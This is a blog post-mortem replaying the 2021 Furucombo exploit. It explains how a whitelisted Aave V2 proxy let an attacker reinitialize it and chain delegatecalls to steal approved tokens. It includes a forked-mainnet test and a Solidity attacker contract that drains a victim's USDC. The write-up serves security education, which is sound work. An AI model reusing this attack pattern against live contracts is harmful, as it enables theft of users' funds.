Replaying Ethereum Hacks — Furucombo

Christoph Michel
5 min readFeb 28, 2021

Furucombo has been exploited yesterday for ~15M USD.

Let’s dive into the attack, understand it by reading the code of the relevant contracts, and then replay the hack using a custom contract.


Furucombo lets users build custom DeFi flows through a drag’n’drop interface — think Zapier or If This Then That for DeFi.

The entry-point for the attack is the Furucombo Proxy that some users approved with many different tokens worth millions of dollars. The gist of the attack is that anyone can call into the contract, make it do a delegatecall to a user-controlled contract, which then calls transferFrom to steal previously-approved user tokens. However, as we will see, this delegatecall is done through another layer of indirection, the Aave V2 Proxy.

The following code is run when calling the batchExec function:

function batchExec(
address[] memory tos,
bytes32[] memory configs,
bytes[] memory datas
) public payable {
_preProcess(); // not important
_execs(tos, configs, datas); // LOOK HERE
_postProcess(); // not important

function _execs(
address[] memory tos,
bytes32[] memory configs,
bytes[] memory datas
) internal {
// ...
for (uint256 i = 0; i < tos.length; i++) {
// Check if the data contains dynamic parameter
if (!configs[i].isStatic()) {
// not important
// Check if the output will be referenced afterwards
if (configs[i].isReferenced()) {
// not important
} else {
_exec(tos[i], datas[i]);
// not important

function _exec(address _to, bytes memory _data)
returns (bytes memory result)
// expands to IRegistry(_getRegistry()).isValid(_to);
require(_isValid(_to), "Invalid handler");
assembly {
let succeeded := delegatecall(
sub(gas(), 5000),
add(_data, 0x20),

// ... more stuff

Anyone can call batchExec with a list of contracts and payloads, and these contracts are then processed one by one. If the contract is valid a delegatecall to the contract is executed. At the time of the exploit the Aave V2 contract was registered as valid. Notice how the Aave contract is a proxy contract itself:

contract InitializableUpgradeabilityProxy is BaseUpgradeabilityProxy {
function initialize(address _logic, bytes memory _data) public payable {
require(_implementation() == address(0));
assert(IMPLEMENTATION_SLOT == bytes32(uint256(keccak256('eip1967.proxy.implementation')) - 1));
if (_data.length > 0) {
(bool success, ) = _logic.delegatecall(_data);

fallback() external payable {

// inherited from Proxy
function _delegate(address implementation) internal {
assembly {
calldatacopy(0, 0, calldatasize())

// Call the implementation.
let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0)

// ... more stuff

// noop
function _willFallback() internal virtual {}

In its fallback function it does another delegatecall to the implementation logic contract. And anyone can set the implementation contract by calling its initialize action.

One fundamental thing to understand here is that when doing a delegatecall, the storage of the caller is used. This contract might already be initialized under its own context storage, but it was not initialized in the Furucombo contract's storage yet. I am also not sure if it was ever supposed to be initialized from the Furucombo proxy or why it was added to the whitelist. Fact is, that it allows a delegatecall to the attacker contract through these two steps:

  1. Setup: Call Furucombo.batchExec with the AaveV2Proxy address. This passes the whitelist and _delegatecall_s to the Aave proxy. The attacker chooses the function data to be initialize(attackerContract) which then sets the implementation contract to the attacker contract.
  2. Attack: The attacker can now use the double-delegation chain to call into their attacker contract while still being under the Furucombo contract’s context. The attacker contract itself is simple and just needs to call transferFrom(victim, attacker, allowedBalance) to steal the funds from victims that approved the Furucombo contract.
  • Furucombo.batchExec(aaveV2Proxy, attackerData)
    =delegatecall=> aaveV2Proxy.fallback(attackerData)
    =delegatecall=> aaveV2Proxy.logicContract.fallback(attackerData)


Let’s replay this hack to confirm the attack vector. It’s enough to replay the attack for a single victim, stealing other tokens is the same. For example, we can replay this transaction which steals 1.7M USDC among other tokens.

describe("Furucombo Hack", function () {
// USDC victim of this hack transaction:
const victimAddress = `0x13f6f084e5faded2276def5149e71811a7abeb69`;
let victimBalance: BigNumber;

it("checks allowances", async function () {
// check that a victim approved the furucombo proxy
victimBalance = await usdc.balanceOf(victimAddress);
const allowance = await usdc.allowance(
`Victim USDC balance: ${ethers.utils.formatUnits(
)}\nAllowance of Furucombo Proxy: ${allowance.toHexString()}`

it("checks _isValid(aaveV2Proxy)", async function () {
// is a private storage field, need to read it raw
const HANDLER_REGISTRY_SLOT = `0x6874162fd62902201ea0f4bf541086067b3b88bd802fac9e150fd2d1db584e19`;
const registryAddr = BigNumber.from(
await ethers.provider.getStorageAt(
console.log(`Registry address: ${registryAddr}`);
const registry = await ethers.getContractAt(`IRegistry`, registryAddr);
const isValid = await registry.isValid(aaveV2Proxy.address);
expect(isValid, "!isValid");

We fork the ETH mainnet from block number 11940499 and confirm that the victim approved the Furucombo contract and that the Aave V2 proxy is registered as valid.

For the actual attack, we can create a smart contract that has two functions, one for the setup step, one for the attack:

contract Attacker {
IProxy public constant furucombo =
IAaveV2Proxy public constant aaveV2Proxy =

function setup() external payable {
address[] memory tos = new address[](1);
bytes32[] memory configs = new bytes32[](1);
bytes[] memory datas = new bytes[](1);
// aaveV2Proxy is whitelisted and passes registry._isValid(aaveV2Proxy)
// then delegatecalls to aaveV2Proxy.initialize(this, "");
// which stores implementation address
tos[0] = address(aaveV2Proxy);
datas[0] = abi.encodeWithSelector(
furucombo.batchExec(tos, configs, datas);

function attack(IERC20 token, address sender) external payable {
address[] memory tos = new address[](1);
bytes32[] memory configs = new bytes32[](1);
bytes[] memory datas = new bytes[](1);
tos[0] = address(aaveV2Proxy);
datas[0] = abi.encodeWithSelector(
// aaveV2Proxy is whitelisted and passes registry._isValid(aaveV2Proxy)
// then delegatecalls to aaveV2Proxy.fallback
// which delegatecalls again to its implementation address
// which was changed in setup to "this"
// meaning, furucombo delegatecalls to this.attackDelegated
furucombo.batchExec(tos, configs, datas);

function attackDelegated(IERC20 token, address sender) external payable {
token.transferFrom(sender, tx.origin, token.balanceOf(sender));

Calling setup followed by attack(usdcAddress, victimAddress) does indeed end up netting the attacker 1.7M USDC. The full test code is available in this repo.

To sum up:

  • Be careful of initializer functions. There is no such thing as “a contract (or storage field) is initialized”, it’s always relative to the current context — which can be changed via delegatecall
  • Having a whitelist is great, but blindly adding a contract to a whitelist because it’s from a well-known, audited project is a bad idea. Check how the contract composes with your project


A question that I’ve seen being asked a lot is why this hasn’t been caught during the audits. In general, audits are done on the smart contract code disregarding any deployments. This attack was only possible because the Furucombo team keeps a dynamic whitelist and they manually whitelisted a vulnerable contract. While the audit should definitely have stated that one needs to check whether whitelisting a contract leads to vulnerabilities, the decision on what contracts to add, and therefore the responsibility to do due diligence, is solely on the project party.

This post is part of the Replaying Ethereum Hacks series



Christoph Michel

Full Stack Software Engineer #javascript #EOS. Into Recreational Math / CS 🤯 Just message me about anything, my mind is open.